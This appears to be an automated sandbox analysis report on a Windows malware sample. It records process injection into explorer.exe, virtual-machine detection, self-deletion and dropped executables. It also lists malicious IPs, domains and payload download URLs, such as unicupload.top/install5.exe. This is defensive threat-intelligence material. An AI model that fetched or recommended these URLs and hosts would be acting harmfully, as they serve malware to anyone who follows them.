behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 545931 Sample: UZ6FEqlix4 Startdate: 28/12/2021 Architecture: WINDOWS Score: 100 37 host-data-coin-11.com 2->37 45 Multi AV Scanner detection for domain / URL 2->45 47 Found malware configuration 2->47 49 Antivirus detection for URL or domain 2->49 51 5 other signatures 2->51 10 UZ6FEqlix4.exe 2->10         started        12 eveggtb 2->12         started        signatures3 process4 signatures5 15 UZ6FEqlix4.exe 10->15         started        65 Multi AV Scanner detection for dropped file 12->65 67 Machine Learning detection for dropped file 12->67 18 eveggtb 12->18         started        process6 signatures7 71 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 15->71 73 Maps a DLL or memory area into another process 15->73 75 Checks if the current machine is a virtual machine (disk enumeration) 15->75 20 explorer.exe 2 15->20 injected 77 Creates a thread in another existing process (thread injection) 18->77 process8 dnsIp9 39 185.233.81.115, 443, 49800 SUPERSERVERSDATACENTERRU Russian Federation 20->39 41 unicupload.top 54.38.220.85, 49859, 80 OVHFR France 20->41 43 6 other IPs or domains 20->43 31 C:\Users\user\AppData\Roaming\eveggtb, PE32 20->31 dropped 33 C:\Users\user\AppData\Local\Temp\411F.exe, PE32 20->33 dropped 35 C:\Users\user\...\eveggtb:Zone.Identifier, ASCII 20->35 dropped 53 System process connects to network (likely due to code injection or exploit) 20->53 55 Benign windows process drops PE files 20->55 57 Deletes itself after installation 20->57 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->59 25 411F.exe 20->25         started        file10 signatures11 process12 signatures13 61 Multi AV Scanner detection for dropped file 25->61 63 Machine Learning detection for dropped file 25->63 28 411F.exe 25->28         started        process14 signatures15 69 Checks if the current machine is a virtual machine (disk enumeration) 28->69
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.233.81.115
 unknown Russian Federation
50113 SUPERSERVERSDATACENTERRU true
47.251.11.252
 host-data-coin-11.com United States
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC true
185.186.142.166
 unknown Russian Federation
204490 ASKONTELRU true
54.38.220.85
 unicupload.top France
16276 OVHFR true

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
unicupload.top 54.38.220.85 true
host-data-coin-11.com 47.251.11.252 true
privacytools-foryou-777.com 47.251.11.252 true
data-host-coin-8.com 47.251.11.252 true
infinity-cheats.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://host-data-coin-11.com/ true
  • URL Reputation: safe
 unknown
http://file-coin-host-12.com/ true
  • URL Reputation: safe
 unknown
http://data-host-coin-8.com/files/5376_1640094939_1074.exe false
  • Avira URL Cloud: safe
 unknown
http://unicupload.top/install5.exe true
  • URL Reputation: phishing
 unknown
http://privacytools-foryou-777.com/downloads/toolspab3.exe true
  • Avira URL Cloud: malware
 unknown